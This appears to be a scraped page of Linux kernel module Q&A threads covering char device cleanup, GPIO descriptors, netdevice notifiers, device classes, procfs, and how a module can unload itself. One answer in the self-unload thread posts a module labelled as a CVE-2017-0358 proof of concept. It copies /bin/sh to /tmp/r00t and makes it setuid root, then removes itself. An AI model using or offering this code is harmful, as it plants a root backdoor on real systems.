I am writing a simple charcter driver scull based on ldd. For my sample character driver, evethough module is unloaded device with major number exist in /proc/devices. How to remove that?
My module exit function has
void scull_exit(void)
{
unregister_chrdev(Major, "scull1");
cdev_del(my_cdev);
printk(KERN_ALERT "Good Bye\n");
}
I could see the old device with its major number when I load new module after unloading the same.
cdev_del takes a pointer, ensure that your my_cdev is a
pointer.
void cdev_del(struct cdev *);
It is cdev_del, first and unregister_chrdev later, it seems you
have done it the other way, use cdev_del first and then unregister_chrdev_region
You have mixed up old notation of unregister_chrdev and new notation of cdev_del.
either unregister_chrdev should be used when you use register_chrdev for registering
OR
"cdev_init/cdev_add after register_chrdev_region" should be used in conjunction with "cdev_del before unregister_chrdev_region"
struct cdev has an owner field that should be set to THIS_MODULE. Make sure it is set
Related
i am quiet new at writing kernel drivers and there is something bothering me a lot. It would be great if you could kcik me into the right direction.
I am writing a module for a device, that has to be powered via putting a GPIO to HIGH-State.
In Documentation/gpio/* are texts, which say i should use the new descriptor-based interface of the GPIO Framework. But how to use it?
When i make an include like #include
it compiles and i can run the driver. But using gpiod_get(...) just returns fffffffffffffffe. It makes sense somehow, as the implentation of that function within linux/gpio/consumer.h is
static inline struct gpio_desc *__must_check gpiod_get(struct device
*dev, const char *con_id,enum gpiod_flags flags){
return ERR_PTR(-ENOSYS);
}
The implementation of the function exists in drivers/gpio/devres.c as well. How can i use that one?
It looks to me as i am not supposed to use that implementation.
I hope you can help me as it is getting really irritating.
As it turned out it was just necessary to include the file gpio/gpiolib as well which delivers additional definitions.
I work on Ubuntu kernel-mode netfilter module and need information about all network interfaces and their properties in module code.
Inside of init_module() I use register_netdevice_notifier() for that purpose. When callback function is called I can see correct event codes like up/down and other, but it seems that third parameter void* casted to net_device* provides object with invalid properties. ->name is empty string, ->if index is some nonsense number etc.
I tried debug version of module on kernel 3.19 and rebuild also on 4.2. Result is the same, I cannot read properties of net_device relating to event.
What can be problem ?
From what I can see from LXR, you need to call netdev_notifier_info_to_dev on the last parameter to get your net_device * (see here)
I've made a simple module which prints GDT and IDT on loading. After it's done its work, it's no longer needed and can be unloaded. But if it returns a negative number in order to stop loading, insmod will complain, and an error message will be logged in kernel log.
How can a kernel module gracefully unload itself?
As far as I can tell, it is not possible with a stock kernel (you can modify the module loader core as I describe below but that's probably not a good thing to rely on).
Okay, so I've taken a look at the module loading and unloading code (kernel/module.c) as well as several users of the very-suspiciously named module_put_and_exit. It seems as though there is no kernel module which does what you'd like to do. All of them start up kthreads inside the module's context and then kill the kthread upon completion of something (they don't automatically unload the module).
Unfortunately, the function which does the bulk of the module unloading (free_module) is statically defined within kernel/module.c. As far as I can see, there's no exported function which will call free_module from within a module. I feel like there's probably some reason for this (it's very possible that attempting to unload a module from within itself will cause a page fault because the page which contains the module's code needs to be freed). Although this probably could be solved by making a noreturn function which just schedules after preventing the current (invalid) task from being run again (or just running do_exit).
A further point to ask is: are you sure that you want to do this? Why don't you just make a shell script to load and unload the module and call it a day? Auto-unloading modules are probably a bit too close to Skynet for my liking.
EDIT: I've played around with this a bit and have figured out a way to do this if you're okay with modifying the module loader core. Add this function to kernel/module.c, and make the necessary modifications to include/linux/module.h:
/* Removes a module in situ, from within the module itself. */
void __purge_module(struct module *mod) {
free_module(mod);
do_exit(0);
/* We should never be here. */
BUG();
}
EXPORT_SYMBOL(__purge_module);
Calling this with __purge_module(THIS_MODULE) will unload your module and won't cause a page fault (because you don't return to the module's code). However, I would still not recommend doing this. I've done some simple volume testing (I inserted a module using this function ~10000 times to see if there were any resource leaks -- as far as I can see there aren't any).
Oh you can do definitely do it :)
#include <linux/module.h>
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358#gmail.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
char *envp[] = { "HOME=/tmp", NULL };
char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
}
void cleanup_module(void) {
return 0;
printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
get pointer for existing device class (struct class) in Linux kernel module
Hi all!
I am trying to register a device in an existing device class, but I am having trouble getting the pointer to an existing class. Kernel version is Linux 3.3.6.
I can create a class in a module, get the pointer to it and then use it to register the device with:
*cl = class_create(THIS_MODULE, className);
dev_ret = device_create(*cl, NULL, *dev, NULL, driverName);
However I need to register another device in the same class with another module, but I couldn't find a way to get the pointer to an existing class. And I can not create the class again in the other module, because since class already exists class_create returns NULL and not the pointer to the class required by device_create.
I found in:
http://lwn.net/Articles/102500/
A function that returns a pointer to a class by its name:
struct class * class_find(char * name)
However when I try to compile the function compiler says it does not exist.
I thought this function was exported by the kernel (my module have license GPL) but it appears it is not.
Maybe I need to include some header?
I tried to rewrite this function since, its code is list in the above link. But when I try to iterate over class_subsys with:
list_for_each_entry(this_class, &class_subsys.kset.list, subsys.kset.kobj.entry)
now symbol class_subsys is not found. Again I thought it is exported to the kernel.
I am not sure what is missing. Some header?
Am I doing it the wrong way?
There is another function to do it?
I suppose if I could traverse sysfs from start I could get a pointer to an existing class.
But I also did not find how to start traversing sysfs.
All functions I have seen requires a pointer to kobject or kset to start traversing. But I have no pointer even to the root of sysfs or kernel objects, so I can not start traversing the tree to get a class pointer.
Can anyone point me in the right direction please?
I think input core is done this way, here is the snippet
Take a look at: https://github.com/torvalds/linux/blob/master/drivers/input/input.c#L1720
Best regards!
I writing a linux kernel module that does some work with /proc... I'm trying to use the new seq methods for returning the data for /proc... Anyhow, after I call proc_create_data() I have a proc_dir_entry (whose ->data member is pointing at my supplied context)... Anyhow, the file_operations structure is also passed and I really need to know how to access either the proc_dir_entry or the proc_dir_entry->data from the open() file operation...
The answer was to use the PDE macro to convert the inode* into a pointer to the proc_dir_entry, which of course had a "data" member pointing at what I needed.
struct proc_dir_entry* pde = PDE( inode );